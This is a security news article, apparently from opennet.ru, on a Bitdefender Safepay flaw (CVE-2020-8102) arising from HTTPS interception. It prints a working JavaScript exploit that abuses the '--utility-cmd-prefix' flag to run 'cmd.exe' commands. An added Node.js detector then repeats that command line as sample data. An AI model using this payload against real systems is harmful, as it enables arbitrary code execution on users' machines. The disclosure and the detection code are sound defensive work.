Code execution vulnerability in the Bitdefender SafePay secure browser

Vladimir Palant, creator of Adblock Plus, discovered a vulnerability (CVE-2020-8102) in Safepay, a specialized web browser based on the Chromium engine. Safepay ships as part of the Bitdefender Total Security 2020 antivirus package and is intended to make the user's work on the global network more secure (for example, it provides additional isolation when accessing banks and payment systems). The vulnerability allows websites opened in the browser to execute arbitrary code at the operating system level.

The cause of the problem is that the Bitdefender antivirus intercepts HTTPS traffic locally by replacing the site's original TLS certificate. An additional root certificate is installed on the client system, which hides the operation of the traffic inspection system. The antivirus inserts itself into the protected traffic and adds its own JavaScript code to some pages to implement the Safe Search feature, and when there is a problem with the certificate of a secure connection, it replaces the returned error page with its own. Since the new error page is served on behalf of the server being opened, other pages on that server have full access to the content inserted by Bitdefender.

When a site controlled by an attacker is opened, that site can send an XMLHttpRequest and simulate a problem with the HTTPS certificate in the response, which causes Bitdefender to return its substituted error page. Since the error page is opened in the context of the attacker's domain, the attacker can read the contents of the substituted page, including the Bitdefender parameters. The page supplied by Bitdefender also contains a session key that allows the internal Bitdefender API to be used to launch a separate Safepay browser session with arbitrary command-line flags, and to run any system command via the "--utility-cmd-prefix" flag. Example exploit (param1 and param2 are values obtained from the error page):

var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.setRequestHeader("BDNDSS_B67EA559F21B487F861FDA8A44F01C50", param1);
request.setRequestHeader("BDNDCA_BBACF84D61A04F9AA66019A14B035478", param2);
request.setRequestHeader("BDNDWB_5056E556833D49C1AF4085CB254FC242", "obk.run");
request.setRequestHeader("BDNDOK_4E961A95B7B44CBCA1907D3D3643370D", location.href);
request.send("data:text/html,nada --utility-cmd-prefix=\"cmd.exe /k whoami & echo");
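
A defensive counterpart to the request above, as an added example that is not part of the original article or of Bitdefender's code: a Node.js check that scans process-creation events for a browser started with --utility-cmd-prefix as a real argument. The event records, the executable path and the simplified quoting rules are assumptions constructed for illustration.

```javascript
// Split a Windows-style command line into arguments (simplified: double
// quotes group text, \" is a literal quote; not the full CommandLineToArgvW rules).
function splitCommandLine(cmd) {
  const args = [];
  let cur = "", inQuotes = false, started = false;
  for (let i = 0; i < cmd.length; i++) {
    const ch = cmd[i];
    if (ch === "\\" && cmd[i + 1] === '"') { cur += '"'; i++; started = true; }
    else if (ch === '"') { inQuotes = !inQuotes; started = true; }
    else if (/\s/.test(ch) && !inQuotes) {
      if (started) { args.push(cur); cur = ""; started = false; }
    } else { cur += ch; started = true; }
  }
  if (started) args.push(cur);
  return args;
}

const FLAG = "--utility-cmd-prefix";

// Return the wrapper command carried by the flag, or null if the flag is absent.
function findCmdPrefix(cmd) {
  const args = splitCommandLine(cmd);
  for (let i = 1; i < args.length; i++) {      // args[0] is the executable
    if (args[i] === FLAG) return args[i + 1] ?? "";
    if (args[i].startsWith(FLAG + "=")) return args[i].slice(FLAG.length + 1);
  }
  return null;
}

// Constructed sample events (executable path, URLs and PIDs are made up).
const events = [
  { pid: 4012, cmd: '"C:\\Program Files\\Browser\\browser.exe" "https://bank.example/login"' },
  { pid: 4188, cmd: '"C:\\Program Files\\Browser\\browser.exe" data:text/html,nada --utility-cmd-prefix="cmd.exe /k whoami & echo"' },
  { pid: 4230, cmd: '"C:\\Program Files\\Browser\\browser.exe" "https://example.test/?q=a --utility-cmd-prefix=x"' },
];

// Keep only events where the flag is its own argv token, not text inside a quoted URL.
function detect(evts) {
  return evts
    .map(e => ({ pid: e.pid, prefix: findCmdPrefix(e.cmd) }))
    .filter(r => r.prefix !== null);
}

console.log(detect(events));
```

Only the second event is reported: its URL argument was passed unquoted, so the flag became a separate argument, while the third event carries the same text inside one quoted URL.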


Recall that a study conducted in 2017 showed that 24 of the 26 tested antivirus products that inspect HTTPS traffic by spoofing certificates reduced the overall security level of the HTTPS connection.
Only 11 of the 26 products offered up-to-date cipher suites. 5 systems did not verify certificates (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). The Kaspersky Internet Security and Total Security products were vulnerable to the CRIME attack, and the AVG, Bitdefender and Bullguard products to the Logjam and POODLE attacks. Dr.Web Antivirus 11 allows a rollback to unreliable export ciphers (the FREAK attack).

Source: opennet.ru
